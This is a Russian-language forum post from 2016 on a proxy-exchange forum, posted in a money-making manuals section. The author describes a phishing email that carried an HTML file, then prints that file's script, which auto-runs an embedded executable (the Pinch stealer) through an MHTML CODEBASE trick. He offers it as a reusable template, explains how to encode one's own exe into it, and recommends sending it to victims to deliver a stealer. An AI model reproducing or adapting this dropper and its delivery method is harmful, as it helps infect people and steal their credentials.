Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

Запуск Ехе-файла через Html страницу(

Тема в разделе Мануалы, способы заработать, создана пользователем Reliance, 27 сен 2016.

Войдите для ответа
  1. Reliance Местный

    Reliance
    Статус:
    Вне сети
    Сообщения:
    68
    Симпатии:
    24
    Регистрация:
    23.11.15
    Сидел я в интернет-клубе, ползал по просторам интернета и решил проверить свой почтовый ящик.
    Там оказалось недавно пришедшее письмо странного содержания.
    В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
    Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
    К письму был прикреплен архив, защищенный паролем.
    А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
    Опять вирусы, подумал я и принялся обезвреживать бомбу.
    Пароль к архиву подошел (так а тож), и передо мной предстал ни вчем не повинный html файлик объемом всего в 15 килобайт.
    Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
    Откылся Блокнот, с содержанием файла docs.html.

    MIME-Version: 1.0
    Content-Location:file:///Pinch.exe
    Content-Transfer-Encoding: base64
    [BINARY TEXT VIRUS]
    <title>Welcome - Home</title>
    <body bgcolor=black scroll=no>
    <script>
    function malware()
    {
    s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    document.write( ' <title>Welcome - Home</title>
    <body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
    Sorry, Error On This Page! Please Open With Internet Explorer</center>
    <object style="cursor:cross-hair" alt="Sorry, Error On This Page!
    Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
    </object>')
    }
    setTimeout("malware()",150)
    </script>
    Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
    Перед вами макет автозапуска виря из html файла.
    Его можно использовать и для ваших творений.
    Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
    А код можно легко получить следующим образом...
    Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
    Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
    И все,отправляем жертву. Хороший способ для отправки стилера.
     
    27 сен 2016 #1
    super_belka нравится это.
Загрузка...
Top